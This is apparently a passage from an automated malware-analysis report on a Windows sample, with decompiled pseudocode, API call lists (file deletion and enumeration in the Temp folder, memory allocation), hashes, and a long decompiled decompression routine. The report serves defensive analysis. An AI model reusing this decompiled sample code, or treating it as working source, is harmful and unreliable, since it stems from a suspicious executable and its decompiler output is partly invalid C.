							return E004058E6(__eflags, _t72, 0);
						}
						L33:
						 *0x423fc8 =  *0x423fc8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                        0x004054c8
                        0x004054cc
                        0x004054d5
                        0x004054d8
                        0x004054db
                        0x004054e3
                        0x004054e5
                        0x004054e6
                        0x00000000
                        0x004054e6
                        0x004054f5
                        0x004054f5
                        0x004054f8
                        0x004054fb
                        0x0040550f
                        0x00405516
                        0x0040551b
                        0x0040551d
                        0x0040552d
                        0x0040551f
                        0x00405525
                        0x00405525
                        0x00405532
                        0x00405535
                        0x00405540
                        0x00405546
                        0x0040554b
                        0x0040555b
                        0x0040555d
                        0x00405563
                        0x00405566
                        0x00405569
                        0x00405626
                        0x00405626
                        0x0040562a
                        0x0040562c
                        0x0040562c
                        0x0040562c
                        0x0040562c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040556f
                        0x0040556f
                        0x00405578
                        0x0040557e
                        0x00405583
                        0x00405586
                        0x00405588
                        0x0040558c
                        0x0040558e
                        0x0040558e
                        0x0040558c
                        0x00405591
                        0x00405594
                        0x004055a7
                        0x004055a9
                        0x004055ae
                        0x004055b5
                        0x004055cd
                        0x004055d3
                        0x004055d9
                        0x004055db
                        0x00405600
                        0x004055dd
                        0x004055dd
                        0x004055e1
                        0x004055f5
                        0x004055e3
                        0x004055e6
                        0x004055ee
                        0x004055ee
                        0x004055e1
                        0x004055b7
                        0x004055bd
                        0x004055bf
                        0x004055c5
                        0x004055c5
                        0x004055bf
                        0x00000000
                        0x004055b5
                        0x00405596
                        0x00405599
                        0x0040559b
                        0x00000000
                        0x00000000
                        0x0040559d
                        0x0040559f
                        0x00000000
                        0x00000000
                        0x004055a1
                        0x004055a5
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405605
                        0x0040560f
                        0x00405615
                        0x00405615
                        0x00405620
                        0x00000000
                        0x00405620
                        0x00405537
                        0x0040553e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004054fd
                        0x004054fd
                        0x004054ff
                        0x00405630
                        0x00405633
                        0x00405636
                        0x00405688
                        0x00405688
                        0x00405688
                        0x00405638
                        0x0040563b
                        0x00405646
                        0x0040564b
                        0x0040564d
                        0x00000000
                        0x00000000
                        0x00405650
                        0x00405656
                        0x0040565c
                        0x00405662
                        0x00405664
                        0x00000000
                        0x00405680
                        0x00405666
                        0x0040566a
                        0x00000000
                        0x00000000
                        0x0040566f
                        0x00000000
                        0x00405676
                        0x0040563d
                        0x0040563d
                        0x00000000
                        0x0040563d
                        0x00405505
                        0x00405509
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405509

                        APIs
                        • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004054DB
                        • lstrcatA.KERNEL32(00421540,\*.*,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405525
                        • lstrcatA.KERNEL32(?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405546
                        • lstrlenA.KERNEL32(?,?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040554C
                        • FindFirstFileA.KERNEL32(00421540,?,?,?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040555D
                        • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040560F
                        • FindClose.KERNEL32(?), ref: 00405620
                        Strings
                        • "C:\Users\user\Desktop\aZOmps0Ug8.exe" , xrefs: 004054BD
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004054C7
                        • \*.*, xrefs: 0040551F
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                        • String ID: "C:\Users\user\Desktop\aZOmps0Ug8.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                        • API String ID: 2035342205-3698310830
                        • Opcode ID: 151e37dfdb71e49779ebe8013d58079144af5c7b104cf071a6fd2cd1a311b3c4
                        • Instruction ID: 6fea787f5ff7f663b03802bfccf250d7b0f6b6b9ddff8139893414afbc0e0c0d
                        • Opcode Fuzzy Hash: 151e37dfdb71e49779ebe8013d58079144af5c7b104cf071a6fd2cd1a311b3c4
                        • Instruction Fuzzy Hash: D851CE30804A447ACB216B218C49BBF3B78DF92728F54857BF809751D2E73D5982DE5E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1001A402, Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 1001A4DC
                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 1001A506
                        • ReadFile.KERNELBASE(00000000,00000000,1001A248,?,00000000), ref: 1001A51D
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 1001A53F
                        • FindCloseChangeNotification.KERNELBASE(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,1001A19C,7FDFFF66), ref: 1001A5B2
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 1001A5BD
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,1001A19C), ref: 1001A608
                        Memory Dump Source
                        • Source File: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                        • String ID:
                        • API String ID: 656311269-0
                        • Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                        • Instruction ID: 08dd0d8a1b5c369709eae3767430104e5388ea3a98c6ad7ed95ce82a3af55b79
                        • Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                        • Instruction Fuzzy Hash: 1F616175E04714ABCB10CFB4C884BAEB7F6EF49650F108059E905EB395E674EE818B54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004061D4, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 98%
                        			E004061D4() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4)); // executed
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
